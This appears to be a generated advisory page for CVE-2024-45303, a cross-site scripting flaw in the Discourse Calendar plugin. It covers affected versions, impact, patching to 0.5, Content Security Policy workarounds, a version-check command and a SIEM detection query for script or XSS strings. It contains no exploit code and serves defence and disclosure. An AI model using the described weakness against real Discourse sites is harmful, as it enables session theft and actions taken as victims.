CVE-2024-45303 – The Discourse Calendar plugin contains a cross-... (How to Fix)

Q: What is the severity of CVE-2024-45303?

CVE-2024-45303 has a CVSS score of 6.1 (MEDIUM). The Discourse Calendar plugin contains a cross-site scripting (XSS) vulnerability where malicious event names can execute arbitrary JavaScript when rendered. This only affects Discourse sites that have modified or disabled the default Content Security Policy. Attackers could inject malicious scripts that execute in victims' browsers.

📋 TL;DR

The Discourse Calendar plugin contains a cross-site scripting (XSS) vulnerability where malicious event names can execute arbitrary JavaScript when rendered. This only affects Discourse sites that have modified or disabled the default Content Security Policy. Attackers could inject malicious scripts that execute in victims' browsers.

💻 Affected Systems

Products:

Discourse Calendar plugin

Versions: All versions before 0.5

Operating Systems: All

Default Config Vulnerable: ✅ No

Notes: Only vulnerable if Discourse's default Content Security Policy has been modified or disabled.

📦 What is this software?

Calendar by Discourse

View all CVEs affecting Calendar →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, deface the site, or redirect users to malicious sites.

🟠

Likely Case

Limited XSS attacks stealing session data or performing unauthorized actions within the Discourse platform.

🟢

If Mitigated

No impact if default Content Security Policy is enabled and properly configured.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

XSS exploitation is well-understood, but requires CSP bypass or disabled CSP.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.5

Vendor Advisory: https://github.com/discourse/discourse-calendar/security/advisories/GHSA-rq37-8pf3-4xc8

Restart Required: Yes

Instructions:

1. Update Discourse Calendar plugin to version 0.5 or later. 2. Restart Discourse application. 3. Verify CSP remains enabled and properly configured.

🔧 Temporary Workarounds

Enable/Reinforce Content Security Policy

all

Ensure Discourse's default Content Security Policy is enabled and properly configured to prevent XSS execution.

Check Discourse admin panel for CSP settings
Ensure CSP headers are present in HTTP responses

🧯 If You Can't Patch

Ensure Content Security Policy is enabled and properly configured with script-src directives restricting JavaScript execution.
Implement input validation and output encoding for event names in custom implementations.

🔍 How to Verify

Check if Vulnerable:

Check Discourse Calendar plugin version in admin panel or via command line: `bundle exec rails runner 'puts Discourse.plugins.find { |p| p.name == "discourse-calendar" }.metadata.version'`

Check Version:

bundle exec rails runner 'puts Discourse.plugins.find { |p| p.name == "discourse-calendar" }.metadata.version'

Verify Fix Applied:

Confirm plugin version is 0.5 or higher and test calendar event rendering with potentially malicious input.

📡 Detection & Monitoring

Log Indicators:

Unusual JavaScript execution in calendar events
Multiple failed CSP violation reports
Suspicious event names containing script tags or JavaScript

Network Indicators:

CSP violation reports in browser console
Unexpected outbound requests from calendar pages

SIEM Query:

source="discourse" AND (event="csp_violation" OR message="*calendar*" AND message="*script*" OR message="*XSS*")

📊 Metadata

CVE ID: CVE-2024-45303

CVSS v3 Score: 6.1 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: September 12, 2024

Last Updated: September 18, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-45303, you might also want to check these: